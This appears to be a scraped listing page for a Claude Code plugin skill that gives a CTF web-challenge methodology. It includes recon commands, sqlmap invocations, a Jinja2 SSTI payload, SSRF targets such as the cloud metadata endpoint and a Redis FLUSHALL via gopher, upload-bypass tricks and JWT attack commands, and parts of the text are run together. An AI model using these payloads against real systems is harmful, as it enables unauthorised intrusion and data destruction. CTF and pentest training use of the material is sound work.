Stats
Actions
Tags
From cybersec-toolkit
Provides a decision tree and tool stack for solving CTF web challenges including SQLi, XSS, SSRF, SSTI, IDOR, auth bypass, file upload, deserialization, prototype pollution, race conditions, and JWT attacks.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersec-toolkit:ctf-webThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
```bash
# Always start with these — in parallel
curl -sI http://target/ # headers
run_tool("ffuf", "-w wordlist -u http://target/FUZZ") # dir bust
run_tool("gobuster", "dir -u http://target -w wordlist")
run_tool("whatweb", "http://target") # tech stack
nikto -h http://target # web scanner
Source view:
view-source: — comments, hidden inputs, JS files/robots.txt, /sitemap.xml, /.git/, /.env, /.DS_Storewappalyzer / whatweb for stack — frameworks dictate attack classFor each endpoint:
| Symptom | Likely class | Tool |
|---|---|---|
| Input echoed in HTML | XSS | manual + XSStrike |
| Error contains SQL | SQLi | sqlmap (registry) |
| URL parameter triggers fetch | SSRF | manual + gopherus for protocols |
Template syntax {{7*7}} → 49 | SSTI | tplmap, manual jinja2/twig payloads |
| Numeric ID in URL/body | IDOR | manual enum + Burp Repeater |
| Login form, error tells "user not found" vs "wrong pass" | User enum | manual |
| File upload | Upload bypass | BurpSuite, manual extension/MIME tricks |
Cookie: with base64/JSON | Cookie tampering | manual |
Authorization: Bearer eyJ... | JWT | jwt_tool, jwt-cracker |
__proto__ or constructor accepted | Prototype pollution | manual JS payloads |
| Race-prone action (claim, vote) | Race condition | turbo-intruder Burp ext |
| Java/PHP/Ruby with unsafe deserialize | Deserialization | ysoserial, phpggc |
# Boolean-based, time-based, UNION
sqlmap -u "http://target/page?id=1" --batch --level=5 --risk=3 --dbs
# Cookie/header injection
sqlmap -u http://target/ --cookie="session=*" --level=5
# POST data
sqlmap -u http://target/login --data="user=*&pass=*"
Identify engine first: {{7*7}} works in Jinja/Twig, ${7*7} in FreeMarker, <%= 7*7 %> in ERB.
Jinja2 RCE: {{ ''.__class__.__mro__[1].__subclasses__() }} — find subprocess/Popen.
http://169.254.169.254/latest/meta-data/http://127.0.0.1:port/gopher://localhost:6379/_FLUSHALL for redisTry in order: rename extension (.php → .phtml/.php5/.phar), MIME spoofing, double extension (file.jpg.php), null byte (file.php%00.jpg), magic byte prefix, .htaccess upload, polyglot (PHP-in-JPG).
jwt_tool <token> # decode + check
jwt_tool <token> -X a # alg=none
jwt_tool <token> -X i # weak HMAC
jwt_tool <token> -X k -pk public.pem # key confusion (RS→HS)
jwt-cracker <token> -d wordlist.txt # crack HMAC secret
whatweb (move on)curl or Burp RepeaterUse the writeup-template skill.
npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkitExecutes exploitation tests for web/API vulnerabilities like SQLi, XSS, SSRF, JWT confusion, deserialization, prototype pollution during pentest phase 3.
Provides OWASP-aligned bug bounty testing methodology with attack catalog, payload sources, and tool ordering for SQLi, XSS, SSRF, SSTI, IDOR, auth, race conditions, file upload, and deserialization.
Provides security payloads, bypass tables, wordlists, and submission rules for XSS, SSRF, SQLi, XXE, NoSQLi, command injection, SSTI, IDOR, path traversal, HTTP smuggling, WebSocket, and MFA bypass. Also includes an always-rejected bug list and conditionally-valid-with-chain table.